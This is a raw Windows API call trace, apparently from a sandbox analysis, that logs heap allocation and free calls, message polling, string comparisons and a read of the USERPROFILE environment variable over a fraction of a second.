[0205.916] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.916] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0205.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0205.916] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0205.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0205.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0205.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0205.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0205.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0205.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0205.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0205.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0205.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="erIdlI.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rIdlI.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0205.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IdlI.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dlI.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lI.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.917] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="I.wav", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0205.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0205.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0205.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0205.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0205.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0205.917] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0205.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0205.917] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0205.917] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0205.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0205.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0205.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0205.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0205.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0205.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0205.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0205.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0205.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0205.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0205.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0205.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0205.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0205.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x16) returned 0x29f7080 [0205.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0205.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="erIdlI.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rIdlI.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IdlI.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dlI.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0205.918] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lI.wav", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0205.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0205.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0205.918] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0205.918] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0205.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0205.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0205.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0205.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0205.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0205.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0205.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0205.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73610 | out: hHeap=0x2af0000) returned 1 [0205.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0205.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0205.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0205.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0205.919] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0205.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0205.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0205.919] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0205.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0205.919] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0205.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0205.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72388 [0205.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0205.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0205.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0205.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.919] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0205.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0205.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0205.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0205.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0205.920] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0205.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0205.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7e0 [0205.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0205.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0205.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0205.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0205.920] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0205.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0205.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0205.920] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0205.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0205.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0205.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0205.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0205.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0205.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa828 | out: hHeap=0x2af0000) returned 1 [0205.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0205.920] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0205.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0205.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f60 [0205.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0205.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74ab8 [0205.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77ee0 | out: hHeap=0x2af0000) returned 1 [0205.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0205.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0205.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0205.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0205.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0205.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0205.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0205.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0205.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0205.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72338 [0205.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0205.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0205.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0205.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0205.921] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0205.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0205.921] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0205.922] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0205.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0205.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0205.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa768 [0205.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0205.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0205.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa600 [0205.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0205.922] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0205.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa828 [0205.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0205.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0205.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0205.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0205.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0205.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0205.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0205.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0205.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0205.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0205.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0205.922] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0205.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0205.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0205.922] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74df8 [0205.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0205.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0205.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0205.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0205.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0205.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70a0 | out: hHeap=0x2af0000) returned 1 [0205.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0205.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0205.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72218 [0205.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0205.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0205.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0205.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0205.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0205.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0205.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0205.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0205.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0205.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0205.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0205.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722f8 [0205.923] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0205.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0205.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0205.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0205.923] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0205.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0205.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0205.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0205.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72328 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0205.924] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0205.924] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0205.925] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0205.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0205.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0205.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0205.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0205.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0205.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0205.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0205.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0205.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.925] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0205.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0205.925] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0205.925] 